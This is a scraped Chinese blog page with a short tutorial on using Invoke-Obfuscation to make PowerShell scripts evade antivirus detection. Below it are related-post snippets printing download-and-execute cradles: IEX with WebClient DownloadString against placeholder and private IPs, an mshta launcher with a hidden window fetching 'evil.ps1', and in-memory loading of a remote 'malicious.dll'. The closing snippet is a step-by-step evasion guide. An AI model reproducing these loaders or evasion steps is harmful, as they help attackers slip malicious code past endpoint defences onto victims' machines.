【免杀】powershell

原创

已于 2023-06-28 19:52:00 修改 · 357 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

于 2023-06-24 18:32:07 首次发布

该文章介绍了如何下载并使用Invoke-Obfuscation工具对Powershell脚本进行混淆处理，以避开某些浏览器的检测。尽管这种方法可能使脚本在某些扫描服务如Virscan和VirusTotal上的报毒率较低，但并不是所有安全软件都能绕过这种混淆技术。

下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation
进入Invoke-Obfuscation目录，在powershell中执行

Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

如果报错，在管理员权限下powershell执行

set-ExecutionPolicy RemoteSigned
y

set scriptpath C:\Users\Admin\Desktop\shell.ps1
设置要混淆的脚本位置
 encoding
 选择混淆方法
 1
 选择编码方式
 out shell.ps1
 输出为文件

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

逢星

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Apache Flink (最新版本) 远程代码执行

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

05-04

1089

路虽远，行则将至；事虽难，做则必成

PowerShell免杀上线远控(可二开cs,生成即免杀)

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

08-16

1640

我翻开历史一查，这历史没有年代，歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着，仔细看了半夜，才从字缝里看出字来，满本都写着两个字是“吃人”

1 条评论您还未登录，请先登录后发表或查看评论

免杀对抗-PowerShell-混淆+分离

xiaoheizi的博客

09-15

977

解码代码：$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了，这个火绒真的搞不懂，只经过base64编码的让过了，经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开，将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。

PowerShell远程下载文件命令大全

最新发布

Bruce_xiaowei的博客

10-30

360

PowerShell提供了多种远程下载文件的方法，包括基础下载命令(Invoke-WebRequest、WebClient)、高级下载选项(带进度显示、下载字符串)、认证设置(Basic认证、自定义请求头)、BITS后台传输服务，以及处理HTTPS证书的方法。特别提供了实用下载函数和批量下载函数模板，方便日常使用。这些命令适用于系统管理、文件传输和渗透测试等场景，其中Invoke-WebRequest是最推荐的标准方法，BITS适合大文件后台下载，而WebClient则提供更多底层控制。注意某些命令可能需要

免杀对抗-Powershell-混淆无文件

m0_62172162的博客

04-25

1001

免杀对抗-Powershell-混淆无文件

Powershell免杀

土豆的博客

07-08

954

目录 Somethingu have to know： 0x01调用混淆 0x02别名混淆 0x03转义符混淆 0x04 拆分混淆 0x05 例子 Somethingu have to know： ps1代码自身免杀，但在用powershell执行远程下载或执行shellcode时，很容易触发杀软行为规则，查杀主要靠行为检测，powershell混淆姿势有很多，如字符串转换、变量转换、编码、压缩等等。都是根据powershell语言的特性来混淆代码，从而绕过杀软。...

powershell免杀详解

m0_57836225的博客

08-20

1634

也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`，通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释：PowerShell 模块是一种组织和封装 PowerShell 代码的方式，`.psm1`文件包含函数、变量、别名等，可以将一组相关的功能打包在一起，以便在多个脚本中重复使用，提高代码的可维护性和可重用性。

【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator

2401_84969340的博客

05-13

577

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】

AA8j的博客

07-06

2788

0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法生成powershell： powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行：Import-Module .\Invoke-Obfuscati

免杀------代替powershell执行语句免杀

m0_60571990的博客

11-08

407

免杀------代替powershell执行语句免杀

免杀-PowerShell

weixin_58782362的博客

11-20

940

win自带defender杀毒工具，所以defender和powershell用的同一种语言，很容易被查杀，所以我们尽量就不要用powershell。如果是powershell脚本，只要对方执行就能上线，如果是cmd，先输入powershell，然后payload.ps1。2、执行模式-直接执行命令（有上线代码），最好别在powershell终端执行，容易出错。1、直接在base64编码上添加，然后将垃圾数据替换为空，最后进行解码。混淆、手工混淆，将内容进行base64编码，然后进行解码。

利用powershell进行免杀

PortugalCR7的博客

06-29

311

利用Invoke Obfuscation进行混淆。查看powershell的版本号（）

免杀 | powershell免杀的几种简单方式

weixin_66717977的博客

03-13

1077

免杀对抗 | powershell免杀 | 免杀技术

我的powershell免杀之路

mingyqf的博客

05-17

2216

我的powershell免杀之路原创 tubai

powershell分离免杀

m0_57836225的博客

08-14

1130

(new-object net.webclient).downloadstring('http://x.x.x.x/a')` ：创建一个 `Net.WebClient` 对象，然后使用 `DownloadString` 方法从指定的 `http://x.x.x.x/a` 网址下载字符串内容，并通过 `IEX` 立即执行该下载的字符串内容。1. 信息窃取 - 一旦恶意的 PowerShell 脚本在系统中执行，它可以窃取敏感信息，如用户的登录凭证、文件内容等，并将这些信息发送给攻击者。

PowerShell命令免杀思路

qq_44657899的博客

11-08

1861

文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳前言 UNIX 系统一直有着功能强大的壳程序（shell），Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序（例如：sh、bash 或 csh），同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过，内存中

如何生成免杀的powershell

08-27

### 生成免杀 PowerShell 脚本的策略为了生成不会被安全软件轻易检测到的 PowerShell 脚本，可以采用多种混淆和执行策略，结合行为规避和代码混淆技术，使脚本在执行过程中更难以被识别为恶意行为。 #### 1. 使用字符串拼接与动态执行 PowerShell 支持通过字符串拼接构造命令，并使用 `IEX`（Invoke-Expression）动态执行。这种方式可以有效打乱静态分析的识别路径。例如： ```powershell $c1='IEX(New-Object Net.WebClient).Downlo' $c2='adString' $c3='http://192.168.0.108/1.ps1' IEX ($c1 + $c2 + "('" + $c3 + "')") ``` 该方式将下载并执行远程脚本，避免直接暴露完整命令，从而绕过部分行为检测机制[^3]。 #### 2. 混淆 PowerShell 代码使用代码混淆工具（如 `Invoke-Obfuscation` 或 `PSObfuscate`）对脚本进行重命名、插入无意义代码、字符串加密等操作，使静态扫描工具难以识别其真实意图。例如： ```powershell $var = 'Ev'+'al' $code = 'Write-Output "Hello World"' Invoke-Expression $var $code ``` 通过将 `Eval` 拆分为多个字符串拼接，再使用 `Invoke-Expression` 执行，可以有效绕过部分静态规则匹配。 #### 3. 分离执行逻辑与数据将关键逻辑与数据分离，例如将 Shellcode 或命令以加密形式存储在远程服务器上，在运行时解密并执行。例如： ```powershell $encrypted = (New-Object Net.WebClient).DownloadString('http://example.com/encrypted.ps1') $key = 'mysecretpassword' $decrypted = Decrypt-Data $encrypted $key IEX $decrypted ``` 此类方法避免在脚本中直接包含可疑内容，降低被静态扫描识别的风险[^1]。 #### 4. 降低权限运行避免以管理员权限运行 PowerShell 脚本，以减少被安全工具标记的可能性。可以通过修改执行策略或在普通用户权限下运行 PowerShell 会话，从而降低可疑性。例如： ```powershell Set-ExecutionPolicy RemoteSigned -Scope CurrentUser ``` 此命令将执行策略限制为当前用户，避免修改系统全局策略，从而减少被监控系统行为的机会[^2]。 #### 5. 使用无文件落地技术 PowerShell 支持从内存中直接加载并执行代码，避免将脚本写入磁盘。例如使用反射加载 .NET 程序集或执行 Shellcode： ```powershell $bytes = (New-Object System.Net.WebClient).DownloadData('http://example.com/malicious.dll') $assembly = [System.Reflection.Assembly]::Load($bytes) $entry = $assembly.EntryPoint $entry.Invoke($null, $null) ``` 该方式不依赖磁盘文件，有效规避基于文件的检测机制。 #### 6. 利用合法程序白名单机制结合系统内置的合法程序（如 `rundll32.exe`、`mshta.exe`）加载 PowerShell 脚本，利用白名单机制绕过检测。例如： ```powershell mshta vbscript:CreateObject("WScript.Shell").Run("powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.com/evil.ps1')",0)(window.close) ``` 该命令通过 `mshta` 启动 PowerShell，避免直接调用 PowerShell.exe，从而绕过部分检测规则。 ### 总结生成免杀 PowerShell 脚本的核心在于规避静态与动态检测机制，包括但不限于代码混淆、行为分离、无文件执行、权限控制等手段。每种方法都有其适用场景和局限性，实际使用中应结合多种技术，以提升绕过检测的成功率。